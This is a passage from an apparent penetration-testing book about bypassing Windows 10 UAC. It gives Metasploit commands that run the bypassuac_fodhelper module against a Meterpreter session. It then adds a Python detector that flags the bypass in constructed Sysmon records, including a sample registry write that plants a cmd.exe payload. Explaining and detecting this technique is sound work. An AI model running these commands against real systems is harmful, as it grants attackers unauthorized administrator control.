Local system escalation
In Windows 10, we can utilize a different technique to bypass the existing privilege restrictions. One of the drawbacks of this attack is that, in order to get system-level access, the affected local user must be a member of the local administrators group.
Attackers will be able to run the Meterpreter shell only in the context of that user. To bypass this restriction, we can leverage multiple post-exploit modules. We will send the background command to our Meterpreter shell and then run the post-exploit module against the backgrounded session. In this example, we will utilize the bypassuac_fodhelper post-exploit module, as shown in Figure 12.5:
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(multi/handler) > set session 1
msf exploit(multi/handler) > exploit
Figure 12.5: Exploiting Windows 10 local privilege escalation
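The flip side of the procedure above, as an added example that is not from the book: the fodhelper bypass works by planting a command under the user's ms-settings protocol handler key, which fodhelper.exe then runs auto-elevated. A defender can catch this in Sysmon telemetry: Event ID 13 writes to that key, and Event ID 1 process creations whose parent is fodhelper.exe. The Sysmon records below are constructed for this demo (field names follow Sysmon's schema; paths, SIDs and file names are made up).

```python
import re

# Registry path (under the user's hive) that fodhelper.exe consults before
# auto-elevating; bypassuac_fodhelper plants its payload command here.
FODHELPER_KEY = re.compile(
    r"\\Software\\Classes\\ms-settings\\Shell\\Open\\command", re.IGNORECASE)

# Constructed Sysmon records for the demo (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\.txt",
     "Details": "txtfile"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes"
                     r"\ms-settings\Shell\Open\command\DelegateExecute",
     "Details": ""},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes"
                     r"\ms-settings\Shell\Open\command\(Default)",
     "Details": r"C:\Windows\System32\cmd.exe /c C:\Users\alice\AppData\Local\Temp\update.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\fodhelper.exe",
     "IntegrityLevel": "High"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "IntegrityLevel": "Medium"},
]


def find_fodhelper_indicators(events):
    """Return (event_index, reason) pairs for records matching the bypass pattern."""
    hits = []
    for i, ev in enumerate(events):
        if ev.get("EventID") == 13 and FODHELPER_KEY.search(ev.get("TargetObject", "")):
            # Any write to the ms-settings handler by a non-installer process is suspect.
            hits.append((i, "ms-settings handler written by " + ev.get("Image", "?")))
        elif ev.get("EventID") == 1 and \
                ev.get("ParentImage", "").lower().endswith(r"\fodhelper.exe"):
            # fodhelper.exe normally launches no child; a High-integrity shell is the payoff.
            hits.append((i, f"child of fodhelper.exe at {ev.get('IntegrityLevel')} "
                            f"integrity: {ev.get('Image')}"))
    return hits


if __name__ == "__main__":
    for idx, why in find_fodhelper_indicators(SAMPLE_EVENTS):
        print(f"event {idx}: {why}")
```

Clearing the planted key is the usual cleanup, so the Event ID 13 writes are often the only lasting trace; alerting on them is cheaper than hunting the short-lived elevated child.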
The bypassuac_fodhelper module in the Meterpreter shell will utilize...